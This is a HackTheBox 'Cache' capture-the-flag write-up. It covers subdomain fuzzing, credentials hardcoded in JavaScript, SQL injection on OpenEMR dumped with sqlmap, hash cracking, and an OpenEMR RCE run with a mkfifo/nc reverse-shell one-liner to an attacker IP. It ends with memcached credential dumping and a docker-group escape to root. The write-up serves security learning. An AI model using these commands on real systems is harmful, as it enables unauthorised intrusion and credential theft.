HackTheBox - Cache

Summary

Cache,a Linux box created by HackTheBox user ASHacker, was an overall medium difficulty box.The Initial enumeration is finding a domain hms.htb which is running a openemr which has a a SQLi which can give us a hash,cracking the hash and it also have a RCE which give us a shell. We also had a cred from the cache.htb. Using that we can su to get user. Enumerating in the shell we see memcached is running from which we can grab the password for second user luffy.su to that we see luffy is a memeber of docker group using that we can get root.

Enumeration

Initial Scan

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Nmap 7.80 scan initiated Sun May 10 00:49:45 2020 as: nmap -sC -sV -oN nmap/cache 10.10.10.188
Increasing send delay for 10.10.10.188 from 0 to 5 due to 40 out of 133 dropped probes since last increase.
Nmap scan report for 10.10.10.188
Host is up (0.26s latency).
Scanned at 2020-05-10 00:49:46 IST for 111s
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCb3lyySrN6q6RWe0mdRQOvx8TgDiFAVhicR1h3UlBANr7ElILe7ex89jpzZSkhrYgCF7iArq7PFSX+VY52jRupsYJp7V2XLY9TZOq6F7u6eqsRA60UVeqkh+WnTE1D1GtQSDM2693/1AAFcEMhcwp/Z7nscp+PY1npxEEP6HoCHnf4h4p8RccQuk4AdUDWZo7WlT4fpW1oJCDbt+AOU5ylGUW56n4uSUG8YQVP5WqSspr6IY/GssEw3pGvRLnoJfHjARoT93Fr0u+eSs8zWhpHRWkTEWGhWIt9pPI/pAx2eAeeS0L5knZrHppoOjhR/Io+m0i1kF1MthV+qYjDjscf
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFAHWTqc7a2Az0RjFRBeGhfQkpQrBmEcMntikVFn2frnNPZklPdV7RCy2VW7Ae+LnyJU4Nq2LYqp2zfps+BZ3H4=
| 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMnbsx7/pCTUKU7WwHrL/d0YS9c99tRraIPvg5zrRpiF
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 10 00:51:37 2020 -- 1 IP address (1 host up) scanned in 111.55 seconds

Web

in login.html has a functionality.js page which has a link to functionality http://10.10.10.188/jquery/functionality.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
$(function(){

var error_correctPassword = false;
var error_username = false;

function checkCorrectPassword(){
var Password = $("#password").val();
if(Password != 'H@v3_fun'){
alert("Password didn't Match");
error_correctPassword = true;
}
}
function checkCorrectUsername(){
var Username = $("#username").val();
if(Username != "ash"){
alert("Username didn't Match");
error_username = true;
}
}
$("#loginform").submit(function(event) {
/* Act on the event */
error_correctPassword = false;
checkCorrectPassword();
error_username = false;
checkCorrectUsername();


if(error_correctPassword == false && error_username ==false){
return true;
}
else{
return false;
}
});

});

Playing with for an hours i donโ€™t see anything so i thought of enumerating subdomains using.

Enumerating for Subdomains

I cewl author page to create a wordlist and used that to wfuzz

1
wfuzz --hh 8193 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.cache.htb" 10.10.10.188

and

1
wfuzz --hh 8193 -w ./wordlist -H "Host: FUZZ.cache.htb" 10.10.10.188

we get nothing

Another Domain?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
wfuzz --hh 8193,422 -w ./wordlist -H "Host: FUZZ.htb" 10.10.10.188

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.188/
Total requests: 38

===================================================================
ID Response Lines Word Chars Payload
===================================================================

000000033: 302 0 L 0 W 0 Ch "HMS"

Total time: 1.645651
Processed Requests: 38Trying `ash:`
Filtered Requests: 37
Requests/sec.: 23.09116

which gave me a new domain hms.htb which is a openemr

visting http://hms.htb/sql_patch.php we find the version

RCE

SearchSploit show we have an RCE but that is an Authenticated one

1
OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions                                                                                                                                          | exploits/linux/webapps/45202.txt

Trying ash:H@v3_fun resulted in wrong password.

Checking metasploit we see an SQLi

1
auxiliary/sqli/openemr/openemr_sqli_dump which was also for OpenEMR 5.0.1

so i tried that but that also resulted in nothing
and we get 0 tables.

1
http://hms.htb/gacl/setup.php

reveal the username as openemr for database

1
2
3
4
5
6
7
8
9
Configuration:
driver = mysqli_mod,
host = localhost,
user = openemr,
database = openemr,
table prefix = gacl_Testing database connection...
Failed! ERROR connecting to database,
are you sure you specified the proper host, user name, password, and database in admin/gacl_admin.inc.php?
Did you create the database, and give read/write permissions to "openemr" already?

Reading the doc in https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf and playing for hours i was able to get an SQLi on add_edit_event_user.php

Note: Later i also stumble upon youtube video which showed the same

1
2
http://hms.htb/portal/account/register.php
http://hms.htb/portal/add_edit_event_user.php?eid=โ€‹1

I got the event request in a file

1
2
3
4
5
6
7
8
9
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=8tp2a2runqsbq1ikl2v013v0vg
Upgrade-Insecure-Requests: 1
1
sqlmap -r event.req --database openemr -T users_secure --dump
1
2
3
4
5
6
7
8
Database: openemr
Table: users_secure
[1 entry]
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| id | salt | username | password | last_update | salt_history1 | salt_history2 | password_history1 | password_history2 |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| 1 | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL | NULL | NULL | NULL |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+

using john to crack the password as

1
2
3
4
5
john --wordlist=/usr/share/wordlists/rockyou.txt hash
?:xxxxxx

1 password hash cracked, 0 left
username: openemr_admin:xxxxxx

then running

1
python 45161.py http://hms.htb -u openemr_admin -p xxxxxx -c 'rm /tmp/f3v3r;mkfifo /tmp/f3v3r;cat /tmp/f3v3r|/bin/sh -i 2>&1|nc 10.10.X.X 1337 >/tmp/f3v3r'

which get us a low privilege shell.

su ash with the password we already had as H@v3_fun gave us user

1
2
3
4
5
6
ash@cache:~$ whoami;hostname;cut -c 1-15 user.txt
whoami;hostname;cut -c 1-15 user.txt
ash
cache
2fb3dfcf93fddc6
ash@cache:~$

Privilege Escalation (luffy)

Running linpeas and seeing the open ports we see 11211 is listening on localhost.

Connecting to that using telnet as from the documentation of memcached

we see it is running as version VERSION 1.5.6 Ubuntu using the version command.

googling around with exploit for memcached i stumble upon article using which we can dump the keys and we get a passwd as 0n3_p1ec3 and using su again we can get luffy

Privilege Escalation Root

Checking the id from luffy we see he is a member of docker group

1
2
3
luffy@cache:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
luffy@cache:~$

also checking docker images we see

1
2
3
luffy@cache:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ubuntu latest 2ca708c1c9cc 7 months ago 64.2MB

there is a ubuntu image

we can mount / as a volume and chroot which will give us a root shell

1
docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
1
2
3
4
# id;hostname;cut -c 1-15 root.txt
uid=0(root) gid=0(root) groups=0(root)
7a4a1f2ec8c6
a4b14bc7520fb89

and we have pwned Cache ๐Ÿ’ƒ

Related Posts: